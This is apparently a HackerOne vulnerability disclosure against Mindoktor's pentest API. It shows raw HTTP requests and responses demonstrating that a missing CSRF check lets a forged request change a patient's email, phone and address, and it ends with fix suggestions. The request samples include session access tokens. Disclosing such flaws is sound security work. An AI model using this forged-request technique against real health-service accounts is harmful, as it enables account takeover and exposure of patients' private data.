Mindoktor: Lack of CSRF in App allows attackers to change patient PII data

2016-10-21T10:59:19
ID H1:177292
Type hackerone
Reporter fisher
Modified 1970-01-01T00:00:00

Description

Due to the lack of CSRF it's possible for an attacker to change PII data on a user account.

The vulnerable endpoint is: https://app.pentestapi.mindoktor.io/api/v1/user/profile

A example request:

POST /api/v1/user/profile HTTP/1.1 Host: app.pentestapi.mindoktor.io User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json;charset=utf-8 Referer: https://app.pentest.mindoktor.io/ Content-Length: 264 Origin: https://app.pentest.mindoktor.io Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYW5DcmVhdGVDYXNlIjp0cnVlLCJjb21wYW55SUQiOjYsImV4cCI6MTQ3NzA1MDc3MiwiZ3JvdXBJRCI6MiwiaWF0IjoxNDc3MDQ3MDQ5LCJpZCI6NDc3LCJpbnN1cmFuY2VWYWxpZCI6dHJ1ZSwibG9naW5Nb2RlIjoiZWlkIiwibG9naW5TdGF0dXMiOiJjb21wbGV0ZSIsInBlbmRpbmciOmZhbHNlLCJ0b3NBY2NlcHRSZXF1aXJlZCI6ZmFsc2V9.94H8mgPY4D9XMu2eElf-Gk2TFKxFK94KxGYZi8UXyXM DNT: 1 Connection: close

{"firstName":"MikM","lastName":"Fisher","email":"fisher@regala.im","phone":"070-123456","address":"Random SHackerone","postalcode":"12345","city":"Malmo","timeZone":"Europe/Stockholm","prefLang":"sv-SE","lat":55.61029815673828,"lng":13.074899673461914,"status":1}

Yields a example response: HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://app.pentest.mindoktor.io Content-Type: application/json Vary: Origin Date: Fri, 21 Oct 2016 10:53:21 GMT Content-Length: 403 Via: 1.1 google Alt-Svc: clear Connection: close

{"msg":"LNGProfileUpdated","data":null,"token":"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYW5DcmVhdGVDYXNlIjp0cnVlLCJjb21wYW55SUQiOjYsImV4cCI6MTQ3NzA1MDkyNCwiZ3JvdXBJRCI6MiwiaWF0IjoxNDc3MDQ3MjAxLCJpZCI6NDc3LCJpbnN1cmFuY2VWYWxpZCI6dHJ1ZSwibG9naW5Nb2RlIjoiZWlkIiwibG9naW5TdGF0dXMiOiJjb21wbGV0ZSIsInBlbmRpbmciOmZhbHNlLCJ0b3NBY2NlcHRSZXF1aXJlZCI6ZmFsc2V9.ESpTJ9uKsp2-esMg1xVok2bT9ApShy1FacApl3V-mkQ"}

Now a malicious attacker can set an attack to change PII data from the user account, such as changing the email address, phone number or even address - in order in the future to retrieve more sensitive data (e.g. patient conditions/diseases).

E.g.:

POST /api/v1/user/profile HTTP/1.1 Host: app.pentestapi.mindoktor.io User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json;charset=utf-8 Referer: https://app.pentest.mindoktor.io/ Content-Length: 264 Origin: https://app.pentest.mindoktor.io Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYW5DcmVhdGVDYXNlIjp0cnVlLCJjb21wYW55SUQiOjYsImV4cCI6MTQ3NzA1MDc3MiwiZ3JvdXBJRCI6MiwiaWF0IjoxNDc3MDQ3MDQ5LCJpZCI6NDc3LCJpbnN1cmFuY2VWYWxpZCI6dHJ1ZSwibG9naW5Nb2RlIjoiZWlkIiwibG9naW5TdGF0dXMiOiJjb21wbGV0ZSIsInBlbmRpbmciOmZhbHNlLCJ0b3NBY2NlcHRSZXF1aXJlZCI6ZmFsc2V9.94H8mgPY4D9XMu2eElf-Gk2TFKxFK94KxGYZi8UXyXM DNT: 1 Connection: close

{"firstName":"MikM>","lastName":"Fisher","email":"evil-email@regala.im","phone":"070-99999","address":"Evil Hackerone Location","postalcode":"12345","city":"Malmo","timeZone":"Europe/Stockholm","prefLang":"sv-SE","lat":55.61029815673828,"lng":13.074899673461914,"status":1}

(Changed email, phone number and address).

It returns the following: HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://app.pentest.mindoktor.io Content-Type: application/json Vary: Origin Date: Fri, 21 Oct 2016 10:57:32 GMT Content-Length: 403 Via: 1.1 google Alt-Svc: clear Connection: close

{"msg":"LNGProfileUpdated","data":null,"token":"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjYW5DcmVhdGVDYXNlIjp0cnVlLCJjb21wYW55SUQiOjYsImV4cCI6MTQ3NzA1MTE3NSwiZ3JvdXBJRCI6MiwiaWF0IjoxNDc3MDQ3NDUyLCJpZCI6NDc3LCJpbnN1cmFuY2VWYWxpZCI6dHJ1ZSwibG9naW5Nb2RlIjoiZWlkIiwibG9naW5TdGF0dXMiOiJjb21wbGV0ZSIsInBlbmRpbmciOmZhbHNlLCJ0b3NBY2NlcHRSZXF1aXJlZCI6ZmFsc2V9.fbkkuKtw0lnlmz9Sjs-XMr4PHPYWj0du7oSn9cgSmrw"}

So the changes were successful.

To prevent the issue: - Add CSRF token - Request password to make this kind of changes in the account

Best regards. Fisher